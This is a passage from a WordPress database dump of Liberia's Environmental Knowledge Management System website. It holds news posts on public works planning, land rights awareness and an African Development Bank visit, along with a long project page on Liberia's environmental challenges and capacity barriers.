within sectors. Additionally, the country’s degraded and limited infrastructure combined with a low technical and institutional capacity severely limit Liberia’s environmental governance framework and thus its potential to conserve the natural environment, let alone secure long-term benefits from it.\r\n\r\nLeading to the formulation of the Rio Convention mainstreaming project, a National Capacity Self-Assessment (NCSA) was undertaken through a consultative process and participatory approach that involved numerous stakeholders from various sectors in 2006 to establish empirical cause(s) leading to Liberia struggle to fulfill many of the objectives set forth in the Rio Conventions especially information sharing and coordination. The NCSA identified the following barriers that cut across the three Rio Conventions as reasons for the struggle: Inadequate public awareness and education/training, inadequate access to information, Lack of institutional capacities, and Lack of effective mechanism for information processing and sharing.\r\n\r\n<em><strong>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/08/Terms-of-Reference-to-procure-and-install-plugins-and-hosting-subscription.docx\" target=\"_blank\" rel=\"noopener\">Consultant Wanted</a></strong></em>','Call for Expression of Interest to Procure and Install Hosting & Plugins for the Environmental Knowledge Management System','','inherit','closed','closed','','4971-revision-v1','','','2022-08-25 11:39:37','2022-08-25 11:39:37','',4971,'https://ekmsliberia.info/?p=4975',0,'revision','',0),(4976,42,'2022-05-25 13:06:00','2022-05-25 13:06:00','<!-- wp:paragraph -->\n<p>MINISTRY OF PUBLIC WORKS VALIDATION SESSION- \" Preparation of the 5-Year Infrastructure Strategic Plan\"May 23-24, 2022 held at the Corina Hotel. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Simon Gambleh reports:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p> EXECUTIVE SUMMARY - The Ministry of Public Works (MPW) 2022 – 2027 Strategic Plan provides the framework to guide the agency towards achieving its Vision and Mission. The development of the plan has benefited from an extensive cross-collaboration dialogue and engagement with many stakeholders involved with public infrastructure provision in Liberia. At a high level, the plan is envisaged to achieve the following outputs during the period of implementation:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>KEY HIGHLIGHTS ☆ Construction to Paved Standards of XX Kms of Roads Connecting all County Capitals☆Development of various policies to support the mandate of MPW☆Undertaking maintenance on all categories of road (primary, secondary and feeder)☆Provision of requite supporting infrastructure to aid rural development covering water points, rural housing and community services☆Strengthen governance and compliance by undertaking technical audits for infrastructure ☆Design of Bridges and Hydraulic Structures on Specific Network Bottlenecks☆Undertake Monitoring and Evaluation (M&amp;E) of All Projects under MPW\'s Portfolio☆Strengthening Road Maintenance Planning and Monitoring☆ Promote Environmental Conservation and Management☆Strengthening institutional capacity, training and urban development.☆Solicit for additional fundings from partners to support the project development for inclusiveness and enhance social and economic mobility.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Public Works Minister-Designate, Hon. Ruth Coker-Collins and a host of other Authorities at the Ministry including Deputy Ministers for Administration and Rural Development Hon. Joseph P. Todd and Hon. Benjamin Bantoe respectively are in attendance. The two-day interactive session also brings together Resident Engineers, as well as Directors and Assistant Directors at the Ministry of Public Works, Representatives from Finance and Development Planning, Staff from the African Development Bank funded Project Implementation Unit (PIU), amongst others.</p>\n<!-- /wp:paragraph -->','MPW Holds a Two-Day Validation Session for 2022-2027 Strategic Plan','','publish','open','closed','','mpw-holds-a-two-day-validation-session-for-2022-2027-strategic-plan','','','2022-08-26 14:00:35','2022-08-26 14:00:35','',0,'https://ekmsliberia.info/?p=4976',103,'post','',0),(4977,42,'2022-05-30 03:00:00','2022-05-30 03:00:00','<!-- wp:paragraph -->\n<p>Massive awareness hits Nimba County as rural women and girls celebrate the passage of the Land Rights Law (LRL) that gives women and girls the right to own property/land in Liberia. As information dissemination remains key to the management and staff of the Liberia Land Authority (LLA), the LLA with support from Lantmätariet-Sida funded Inclusive Land Administration and Management Project (ILAMP) has commenced robust awareness activities across several communities in Nimba County.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Kindly follow <a rel=\"noreferrer noopener\" href=\"http://www.lla.gov.lr/?fbclid=IwAR2Dqv4aznAXhD8OLOYeMFiEt-uDJL6iZvbNceyG6kQJlbpzJDqBh7GTC0k\" target=\"_blank\">www.lla.gov.lr</a> for details on this story. </p>\n<!-- /wp:paragraph -->','Liberia Land Authority with Support from Lantmätariet-Sida funded Inclusive Land Administration and Management Project (ILAMP) Commenced Awareness in Nimba','','publish','open','closed','','liberia-land-authority-with-support-from-lantmatariet-sida-funded-inclusive-land-administration-and-management-project-ilamp-commenced-awareness-in-nimba','','','2022-08-26 13:14:56','2022-08-26 13:14:56','',0,'https://ekmsliberia.info/?p=4977',106,'post','',0),(4978,42,'2022-08-26 13:13:57','2022-08-26 13:13:57','','lla','','inherit','open','closed','','lla-2','','','2022-08-26 13:13:57','2022-08-26 13:13:57','',4977,'https://ekmsliberia.info/wp-content/uploads/2022/08/lla.jpg',0,'attachment','image/jpeg',0),(4979,42,'2022-08-26 13:14:54','2022-08-26 13:14:54','<!-- wp:paragraph -->\n<p>Massive awareness hits Nimba County as rural women and girls celebrate the passage of the Land Rights Law (LRL) that gives women and girls the right to own property/land in Liberia. As information dissemination remains key to the management and staff of the Liberia Land Authority (LLA), the LLA with support from Lantmätariet-Sida funded Inclusive Land Administration and Management Project (ILAMP) has commenced robust awareness activities across several communities in Nimba County.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Kindly follow <a rel=\"noreferrer noopener\" href=\"http://www.lla.gov.lr/?fbclid=IwAR2Dqv4aznAXhD8OLOYeMFiEt-uDJL6iZvbNceyG6kQJlbpzJDqBh7GTC0k\" target=\"_blank\">www.lla.gov.lr</a> for details on this story. </p>\n<!-- /wp:paragraph -->','Liberia Land Authority with Support from Lantmätariet-Sida funded Inclusive Land Administration and Management Project (ILAMP) Commenced Awareness in Nimba','','inherit','closed','closed','','4977-revision-v1','','','2022-08-26 13:14:54','2022-08-26 13:14:54','',4977,'https://ekmsliberia.info/?p=4979',0,'revision','',0),(4980,42,'2022-05-24 13:17:00','2022-05-24 13:17:00','<!-- wp:paragraph -->\n<p>The Liberia Land Authority/LLA with funding from the World Bank through the LLAP and technical support from IGNF and TETRA TECH has begun Systematic Land Registration of Customary Land Rights in three counties, namely; Lofa, Bong and Margibi Counties, respectively. However, the LLA Communications and Outreach Division (COD) charged with the responsibility to ensure Liberians are informed and educated of their land rights is currently conducting awareness activities across several communities within the three counties through its information dissemination mechanism to ensure residents in the selected communities within the three counties are informed, educated and sensitized of their rights, roles, responsibilities and benefits. Further, the project which is expected to end with the issuance of Statutory Land Deeds covers Gbarline Clan, Salayea District, Lofa County, Dingman Clan, Sanoyea District, Bong County and Kolleh Dapono Town, Dining Clan, Gibi District, Margibi County.</p>\n<!-- /wp:paragraph -->','LLA with Funding from the World Bank Through the Liberia Land Administration Project (LLAP), Commenced Systematic Registration of Customary Land Rights','','publish','open','closed','','lla-with-funding-from-the-world-bank-through-the-liberia-land-administration-project-llap-commenced-systematic-registration-of-customary-land-rights','','','2022-08-26 13:19:44','2022-08-26 13:19:44','',0,'https://ekmsliberia.info/?p=4980',105,'post','',0),(4981,42,'2022-08-26 13:18:51','2022-08-26 13:18:51','','lla','','inherit','open','closed','','lla-3','','','2022-08-26 13:18:51','2022-08-26 13:18:51','',4980,'https://ekmsliberia.info/wp-content/uploads/2022/08/lla-1.jpg',0,'attachment','image/jpeg',0),(4982,42,'2022-08-26 13:19:42','2022-08-26 13:19:42','<!-- wp:paragraph -->\n<p>The Liberia Land Authority/LLA with funding from the World Bank through the LLAP and technical support from IGNF and TETRA TECH has begun Systematic Land Registration of Customary Land Rights in three counties, namely; Lofa, Bong and Margibi Counties, respectively. However, the LLA Communications and Outreach Division (COD) charged with the responsibility to ensure Liberians are informed and educated of their land rights is currently conducting awareness activities across several communities within the three counties through its information dissemination mechanism to ensure residents in the selected communities within the three counties are informed, educated and sensitized of their rights, roles, responsibilities and benefits. Further, the project which is expected to end with the issuance of Statutory Land Deeds covers Gbarline Clan, Salayea District, Lofa County, Dingman Clan, Sanoyea District, Bong County and Kolleh Dapono Town, Dining Clan, Gibi District, Margibi County.</p>\n<!-- /wp:paragraph -->','LLA with Funding from the World Bank Through the Liberia Land Administration Project (LLAP), Commenced Systematic Registration of Customary Land Rights','','inherit','closed','closed','','4980-revision-v1','','','2022-08-26 13:19:42','2022-08-26 13:19:42','',4980,'https://ekmsliberia.info/?p=4982',0,'revision','',0),(4983,42,'2022-06-20 17:00:00','2022-06-20 17:00:00','<!-- wp:paragraph -->\n<p>A high-level African Development Bank Delegation on Monday, June 20, 2022 visited the Ministry of Public Works as part of a multi-sectoral dialogue mission to Liberia which runs from June 20-24, 2022. African Development Bank’s Director-General for West Africa, Mrs. Marie-Laure Akin-Olugbade is heading the Delegation which is in country to \" put strategic guidance from the Bank\'s leadership across different sectors and cross-cutting themes put into motion\". While in Liberia, the Mission seeks to follow up on various projects and programmes financed by the African Development Bank and other Co-Financiers on Agricultural Transformation, Transport Infrastructure and PPPs, Access to Energy, Private Sector Development, amongst others. Meanwhile, the Visiting AfDB Director-General Mrs. Akin-Olugbade reaffirmed the Bank’s commitment to Liberia\'s National Development drive.</p>\n<!-- /wp:paragraph -->','A high-level African Development Bank Delegation visited the Ministry of Public Works as Part of a Multi-Sectoral Dialogue Mission to Liberia','','publish','open','closed','','a-high-level-african-development-bank-delegation-visited-the-ministry-of-public-works-as-part-of-a-multi-sectoral-dialogue-mission-to-liberia','','','2022-08-26 13:24:43','2022-08-26 13:24:43','',0,'https://ekmsliberia.info/?p=4983',104,'post','',0),(4984,42,'2022-08-26 13:24:08','2022-08-26 13:24:08','','mpw','','inherit','open','closed','','mpw-4','','','2022-08-26 13:24:08','2022-08-26 13:24:08','',4983,'https://ekmsliberia.info/wp-content/uploads/2022/08/mpw.jpg',0,'attachment','image/jpeg',0),(4985,42,'2022-08-26 13:24:41','2022-08-26 13:24:41','<!-- wp:paragraph -->\n<p>A high-level African Development Bank Delegation on Monday, June 20, 2022 visited the Ministry of Public Works as part of a multi-sectoral dialogue mission to Liberia which runs from June 20-24, 2022. African Development Bank’s Director-General for West Africa, Mrs. Marie-Laure Akin-Olugbade is heading the Delegation which is in country to \" put strategic guidance from the Bank\'s leadership across different sectors and cross-cutting themes put into motion\". While in Liberia, the Mission seeks to follow up on various projects and programmes financed by the African Development Bank and other Co-Financiers on Agricultural Transformation, Transport Infrastructure and PPPs, Access to Energy, Private Sector Development, amongst others. Meanwhile, the Visiting AfDB Director-General Mrs. Akin-Olugbade reaffirmed the Bank’s commitment to Liberia\'s National Development drive.</p>\n<!-- /wp:paragraph -->','A high-level African Development Bank Delegation visited the Ministry of Public Works as Part of a Multi-Sectoral Dialogue Mission to Liberia','','inherit','closed','closed','','4983-revision-v1','','','2022-08-26 13:24:41','2022-08-26 13:24:41','',4983,'https://ekmsliberia.info/?p=4985',0,'revision','',0),(4986,42,'2022-08-26 13:59:41','2022-08-26 13:59:41','','mpw','','inherit','open','closed','','mpw-5','','','2022-08-26 13:59:41','2022-08-26 13:59:41','',4976,'https://ekmsliberia.info/wp-content/uploads/2022/08/mpw-1.jpg',0,'attachment','image/jpeg',0),(4987,42,'2022-08-26 14:00:33','2022-08-26 14:00:33','<!-- wp:paragraph -->\n<p>MINISTRY OF PUBLIC WORKS VALIDATION SESSION- \" Preparation of the 5-Year Infrastructure Strategic Plan\"May 23-24, 2022 held at the Corina Hotel. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Simon Gambleh reports:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p> EXECUTIVE SUMMARY - The Ministry of Public Works (MPW) 2022 – 2027 Strategic Plan provides the framework to guide the agency towards achieving its Vision and Mission. The development of the plan has benefited from an extensive cross-collaboration dialogue and engagement with many stakeholders involved with public infrastructure provision in Liberia. At a high level, the plan is envisaged to achieve the following outputs during the period of implementation:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>KEY HIGHLIGHTS ☆ Construction to Paved Standards of XX Kms of Roads Connecting all County Capitals☆Development of various policies to support the mandate of MPW☆Undertaking maintenance on all categories of road (primary, secondary and feeder)☆Provision of requite supporting infrastructure to aid rural development covering water points, rural housing and community services☆Strengthen governance and compliance by undertaking technical audits for infrastructure ☆Design of Bridges and Hydraulic Structures on Specific Network Bottlenecks☆Undertake Monitoring and Evaluation (M&amp;E) of All Projects under MPW\'s Portfolio☆Strengthening Road Maintenance Planning and Monitoring☆ Promote Environmental Conservation and Management☆Strengthening institutional capacity, training and urban development.☆Solicit for additional fundings from partners to support the project development for inclusiveness and enhance social and economic mobility.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Public Works Minister-Designate, Hon. Ruth Coker-Collins and a host of other Authorities at the Ministry including Deputy Ministers for Administration and Rural Development Hon. Joseph P. Todd and Hon. Benjamin Bantoe respectively are in attendance. The two-day interactive session also brings together Resident Engineers, as well as Directors and Assistant Directors at the Ministry of Public Works, Representatives from Finance and Development Planning, Staff from the African Development Bank funded Project Implementation Unit (PIU), amongst others.</p>\n<!-- /wp:paragraph -->','MPW Holds a Two-Day Validation Session for 2022-2027 Strategic Plan','','inherit','closed','closed','','4976-revision-v1','','','2022-08-26 14:00:33','2022-08-26 14:00:33','',4976,'https://ekmsliberia.info/?p=4987',0,'revision','',0),(4988,42,'2022-06-18 14:01:00','2022-06-18 14:01:00','<!-- wp:paragraph -->\n<p>Senate Chairman on Public Works and Rural Development, Hon. Edwin Snowe promised the Committee\'s fullest support towards capacity building and the implementation of flagship road projects across the country. For her part, Acting and Public Works Minister- Designate, Dr. Ruth Coker-Collins lauded the Leadership of the Global Quality Council and Green Economy Council for the Training which brought together over twenty participants from five institutions comprising the Ministry of Public Works, Association of Liberian Construction Contractors, Engineering Society of Liberia, Society of Women Engineers of Liberia, as well as the Liberia Institute of Architects. The Public Works Official who was awarded an Honorary Doctor of Science Degree in Civil Engineering for her dedicated and invaluable contributions to the Infrastructural Sector in Liberia and out of the country, lauded the Organizers for her preferment and emphasized the overarching need for capacity building for Public Service Practitioners aimed at enhancing efficiency.</p>\n<!-- /wp:paragraph -->','MPW Holds a Five-Day Training in Global Project and Contract Management Program (GPM)','','publish','open','closed','','mpw-holds-a-five-day-training-in-global-project-and-contract-management-program-gpm','','','2022-08-26 14:07:02','2022-08-26 14:07:02','',0,'https://ekmsliberia.info/?p=4988',102,'post','',0),(4989,42,'2022-08-26 14:06:11','2022-08-26 14:06:11','','mpw','','inherit','open','closed','','mpw-6','','','2022-08-26 14:06:11','2022-08-26 14:06:11','',4988,'https://ekmsliberia.info/wp-content/uploads/2022/08/mpw-2.jpg',0,'attachment','image/jpeg',0),(4990,42,'2022-08-26 14:07:00','2022-08-26 14:07:00','<!-- wp:paragraph -->\n<p>Senate Chairman on Public Works and Rural Development, Hon. Edwin Snowe promised the Committee\'s fullest support towards capacity building and the implementation of flagship road projects across the country. For her part, Acting and Public Works Minister- Designate, Dr. Ruth Coker-Collins lauded the Leadership of the Global Quality Council and Green Economy Council for the Training which brought together over twenty participants from five institutions comprising the Ministry of Public Works, Association of Liberian Construction Contractors, Engineering Society of Liberia, Society of Women Engineers of Liberia, as well as the Liberia Institute of Architects. The Public Works Official who was awarded an Honorary Doctor of Science Degree in Civil Engineering for her dedicated and invaluable contributions to the Infrastructural Sector in Liberia and out of the country, lauded the Organizers for her preferment and emphasized the overarching need for capacity building for Public Service Practitioners aimed at enhancing efficiency.</p>\n<!-- /wp:paragraph -->','MPW Holds a Five-Day Training in Global Project and Contract Management Program (GPM)','','inherit','closed','closed','','4988-revision-v1','','','2022-08-26 14:07:00','2022-08-26 14:07:00','',4988,'https://ekmsliberia.info/?p=4990',0,'revision','',0),(4993,42,'2022-09-02 10:51:05','2022-09-02 10:51:05','<h2>About the EKMS</h2>		\n			<h2>Why was the EKMS created?</h2>		\n		<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and Partner governmental institutions as well as non-governmental organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.</p>\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.</p>\n<h3>Development Challenge</h3>\n<h4>A1. Global Environmental Challenges</h4>\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).</p>\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia’s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).</p>\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia’s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).</p>\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia’s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.</p>\n<h4>Root Causes</h4>\n<p>There are a few key root causes of environmental degradation in Liberia. The most critical include: human settlements and population pressures; shifting cultivation; timber exploitation; and rubber plantations. More generally, root causes are related to over-exploitation of biological resources; poverty; political instability and wars; education; and inadequate law enforcement (Republic of Liberia, 2004). From a reporting perspective, one root cause of Liberia’s development challenges is the fact that Focal Points are located in different agencies, which thereby limits coordination and collaboration between them.</p>\n<h4>A2. Capacity Barriers</h4>\n<p>Liberia has undertaken numerous initiatives to address environmental issues. Despite the achievements Liberia made, Liberia continues to face important challenges to meeting environmental goals. As a Rio Convention mainstreaming project, the proposed strategy sets out to meet barriers identified in Liberia’s 2006 National Capacity Self-Assessment (NCSA), which was undertaken though a consultative process and participatory approach that involved numerous stakeholders from various sectors. Through the inclusive and consultative process of the NCSA, stakeholders identified a number of areas that explain the difficulty in fulfilling the obligations of the Rio Conventions. The NCSA identified the following barriers that cut across the three Rio Conventions:</p>\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li>Inadequate public awareness and education/training</li>\n<li>Inadequate institutions and institutional frameworks</li>\n<li>Inadequate political commitment</li>\n<li>Inadequate planning skills and resources, as well as incomplete structures at all levels of policy implementation</li>\n<li>Inadequate financial resources and economic framework</li>\n<li>Inadequate strategic plans and implementation</li>\n<li>Inadequate access to information</li>\n<li>Inadequate policies and legal frameworks</li>\n<li>Low level of involvement of civil society</li>\n<li>Inadequate natural resources management systems</li>\n<li>Lack of institutional capacities</li>\n<li>Lack of effective mechanism for information processing and sharing</li>\n<li>\n<p>Poor governance</p>\n</li>\n</ul>\n</li>\n</ul>\n</li>\n</ul><p>Liberia’s Agenda for Transformation 2012-2017 confirmed many of the barriers identified in the NCSA. Specifically, the agenda noted the following barriers:</p>\n<ul>\n<li>Weak technical, administrative and managerial capacities;</li>\n<li>Weak institutional coordination;</li>\n<li>Unclear policies and mechanisms to enable effective participation by especially non-state actors; at the national and local levels;</li>\n<li>Limited stakeholder participation in planning and decision-making processes;</li>\n<li>Limited dissemination of key information (Republic of Liberia, 2013).</li>\n</ul>\n<p>Barriers were also reaffirmed in the Liberia Constraints Analysis (Government of Liberia, 2013).</p>\n<h4>A.3 Consistency with National Priorities</h4>\n<p>The country has demonstrated a desire to improve the environmental policy framework with the preparation of multiple new policies including the National Environmental Protection and Management Law (2003), the National Environmental Policy (2003), the establishment of an Environmental Protection Agency, in 2003, the National Forestry Law (2000), and the New Mineral and Mining Laws (2000).</p>\n<p>In the first Poverty Reduction Strategy, the environment was considered a cross-cutting issue. Some achievements made during implementation of this strategy include passage of the Community Rights Law, which established a system for community harvesting of forests. Efforts were also undertaken to improve protected areas management and increase the size/number of protected areas. In Liberia’s medium-term Poverty Reduction Strategy II (2012-2018) there is a fifth pillar: Cross-Cutting Issues which includes the environment. Additionally, environmental issues have been integrated into other pillars of the strategy specifically the economic pillar.</p>\n<p>During the Liberia Rio +20 National Consultative Workshop, Liberia identified five issues that are essential for accomplishing its development goals and objectives. Additionally, Liberia has also developed a National Capacity Development Strategy (2010), which calls for investing in areas needed to achieve development goals.</p>\n<p>The project will assist the Government of Liberia to achieve the national priorities it has set in Liberia RISING 2030. The aim of this is to transform Liberia through a new development strategy, which was launched in December 2012. The overall objective is to turn Liberia into a middle income country by 2030.</p>\n<p>The project is also in line with Liberia’s National Biodiversity Strategy and Action Plan II (NBSAP) which aims to, as part of Liberia’s commitment to the Millennium Development Goals, and in line with the National Environmental Policy of Liberia, assist the people of Liberia to acknowledge and exercise responsible stewardship over biological resources to meet the needs of the present without endangering the ability of future generations to meet their own needs. Some of the goals are to protect critical ecosystems, create biodiversity awareness, and increase commitment to sustainable use of biological diversity (Republic of Liberia, 2017).</p>\n<p>Liberia’s 2008 National Adaptation Plan of Action (NAPA), as a response to the impacts of climate change, aligns with National Environmental Policy which calls for the sustainable management of Liberia’s environment and natural resources. The NAPA also aims to establish synergies between adaptation and national development plans, such as the National Reconstruction and Development Plan, Millennium Development Goals, and the National Biodiversity and Strategy Action Plan. The NAPA identifies key adaptation needs and list priority actions, such as enhancing resilience to increasing rainfall variability through agriculture, to address the needs.</p>\n<p>This project is also in line with Liberia’s UNDAF 2013-2017. The UN Country Team decided that the new UNDAF would also take into account the requirements of Delivering as One. Thus, in addition to the Strategic Framework and Results Matrix, the UNDAF is accompanied by a detailed Costed Action Plan. Together they constitute the One Programme. The four pillars of the One UN Programme are:</p>\n<ul>\n<li>Peace, Security, Rule of Law</li>\n<li>Sustainable Economic Transformation</li>\n<li>Human Development</li>\n<li>Inclusive Governance and Public Institutions</li>\n</ul>\n<p>The UNDAF (One Programme) also aligns with Liberia’s National medium-term strategy, known as the Agenda for Transformation. The Agenda for Transformation is based on five pillars:</p>\n<ul>\n<li>Peace, Security and Rule of Law</li>\n<li>Economic Transformation</li>\n<li>Human Development</li>\n<li>Governance and Public Institutions</li>\n<li>Cross-cutting issues</li>\n</ul>\n<p>The Agenda contains a specific goal to improve management of the environment to safeguard sustained economic development and growth. Specific actions called for in this agenda include: a) developing environmental quality standards and regulatory tools; b) harmonizing environmental laws and policies to ensure improved environmental management; c) undertake a gap analysis of sectoral environmental laws and policies; d) create environmental awareness; e) create training and education programmes; f) develop a public awareness strategy and campaign; g) train professionals in effective environmental management; strengthen environmental units in ministries through training and improved coordination; and h) develop a system to collect and disseminate environmental information/data.</p>\n<p>The design and implementation of the proposed CCCD project would also take into account the development plans of other bilateral and multilateral donors in Liberia to ensure appropriate alignment as well as to leverage the necessary co-financing.</p>\n<h4>A.4 Baseline Scenario and Associated Baseline Projects</h4>\n<p>Liberia is struggling to fulfill many of the objectives set forth in the Rio Conventions. Many of the developed frameworks and plans for action face limited implementation due to limited government resources, limited human capacity, and a lack of appropriate technologies. Liberia struggles with an inadequate system for information and knowledge management and the poor information sharing between or within sectors. Additionally, the country’s degraded and limited infrastructure combined with a low technical and institutional capacity severely limit Liberia’s environmental governance framework and thus its potential to conserve the natural environment, let alone secure long-term benefits from it. The civil war only exacerbated the situation, leading to displacement of individuals and unprecedented amounts of resource exploitation. Although Liberia is recovering from the war, 85% of the population still lives below the international poverty line. Liberia’s HDI (2014) is 0.430, ranking the country 177 out of 188 (UNDP, 2015). </p>\n<p>Multilateral donor agencies specifically in the field of natural resource management currently working in Liberia now include the African Development Bank, GEF, IFAD, UNDP, and the World Bank. Bilateral donor agencies are also very important development partners from, Norway, and the United States (USAID), as well as other inter-governmental organizations such as the CARE International, Conservation International, and the Society for the Conservation of Nature in Liberia. </p>\n<p>National environmental NGOs, with assistance from Conservation International, organized themselves into the Alliance for Conservation in Liberia. The goal of this body is to ensure that all local NGOs who are or would like to be involved in conservation of biodiversity can do so without overlapping efforts or functions. </p>\n<p>Liberia has made significant progress since the end of the civil war by investing in infrastructure, revising existing policies and laws, and reviewing the mandates of political institutions to reduce duplication. One area of progress is updating the mandates and restructuring Government ministries and agencies to improve effectiveness and efficiency. Liberia has also established new agencies like the Rural and Renewable Energy Agency to promote the sustainable development strategy. Reforms in Liberia have been undertaken on an institution-by-institution basis and have not been considered on a holistic basis, nor have they increased coordination and harmonization. </p>\n<p>Between 2010 and 2012, UNEP implemented a global project, entitled Piloting Integrated Processes and Approaches to Facilitate National Reporting to Rio Conventions that included Liberia as a beneficiary country. This project focused on helping Liberia (among other countries) to better organize modalities for accessing and preparing their national reports. Notwithstanding the capacities developed, a number of important capacities remained to be developed, such as the standardization of data collection and information analysis, improved coordination and collaboration to facilitate streamlined national reporting, and increased awareness and stakeholder engagement in the national reporting process. During the project implementation, activities under component 4 will undertake an updated assessment of the systemic, institutional, and individual capacities that remain a priority to be developed in order to meet and sustain Rio Convention obligations.</p>\n<p>A description of on-going projects that this project will coordinate with appears in section C.4 Partnerships. Relevant completed UNDP GEF projects that form the baseline of this project include:</p>\n<h4>Associated Baseline Projects</h4>\n<table style=\"width: 100%;\">\n<tbody>\n<tr>\n<th><strong>Project Name</strong></th>\n<th><strong>Description of project’s alignment with CCCD project</strong></th>\n</tr>\n<tr>\n<td>GEF Enhancing Resilience to Climate Change by Mainstreaming Adaption Concerns into Agricultural Sector Development in Liberia (Ending September 2015)</td>\n<td>The expected results of this project included improving the rural communities’ capacities, increasing sustainable livestock and crop production, and reducing poverty.</td>\n</tr>\n<tr>\n<td>FAO to Support MOA Statistics and Information Management System</td>\n<td>The objective of this project was to support the implementation of a linked information and knowledge system.</td>\n</tr>\n<tr>\n<td>Smallholder Agricultural Productivity Enhancement and Commercialization Project (SAPEC)</td>\n<td>The goal this project was to reduce rural poverty and household food insecurity. One component is capacity building and institutional strengthening, which includes trainings.</td>\n</tr>\n</tbody>\n</table>\n<h3>B. Strategy</h3>\n<h4>B.1 Alternative Strategies</h4>\n<p>During the conceptualization of the present cross-cutting capacity development project, a number of alternative approaches were considered, taking into account the current set of interventions currently underway and planned for Liberia. An important starting point was the findings and recommendations of the National Capacity Self-Assessment, followed by a consideration of the lessons learned from other projects, such as a review of the Final Evaluation of the Mainstreaming and Capacity Building for Sustainable Land Management project . A review of the recommendations contained in the more recent Rio Convention reports was also considered, such as the 2016 National Biodiversity Strategy and Action Plan.</p>\n<p>The single most common cross-cutting capacity development constraint that was recurring in the various assessments and action plans was the significantly low institutional capacity for managing data and information for improved planning and decision-making to meet and sustain Rio Convention obligations. Taking into account the GEF-6 Cross-Cutting Capacity Development priority of strengthening mainstreaming capacities as a strategy to meet the duality of national development and global environmental priorities, this project’s objective was formulated.</p>\n<p>From an implementation perspective, a number of alternative approaches were considered to meet the stated objective. One was for Liberia to continue the same approach of implementing focal area projects, and to strengthen the key set of systemic, institutional, and individual capacities through focal area projects. However, this approach will not address the capacity development gaps nor result in creating synergies. Another aspect considered was to have different components executed by different agencies. The challenge with this approach is the relative weak coordination among government ministries and agencies – indeed an important capacity development need that the project would help address. A related issue was the government’s keen desire to use the project to strengthen national capacity of the Environmental Protection Agency.</p>\n<p>The selected strategy was based on the real need to strengthen meaningful capacities that can be successfully institutionalized. The key here is not for the project to take on more than the Environmental Protection Agency can absorb, but rather, through the process of project execution, learn how to formulate better plans and make better decisions regarding the global environment within the framework of their institutional mandates. That is, this project places a premium on address institutional sustainability by emphasizing the execution of the project through a wide range of learning-by-doing exercises by the EPA. This will require that they reach out of other government ministries and agencies to meet complementary and shared mandates as well as to effectively negotiate resolution of real or perceived conflicts of interests that come about through Rio Convention mainstreaming.</p>\n<h4>B.2 Selected Scenario</h4>\n<p>This project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.</p>\n<p style=\"background-color: lightgray;\">The uniqueness of this project is centered on its cross-cutting nature. Other projects currently under implementation focus on strengthening targeted capacities under one of the three Rio Conventions, and thus have a 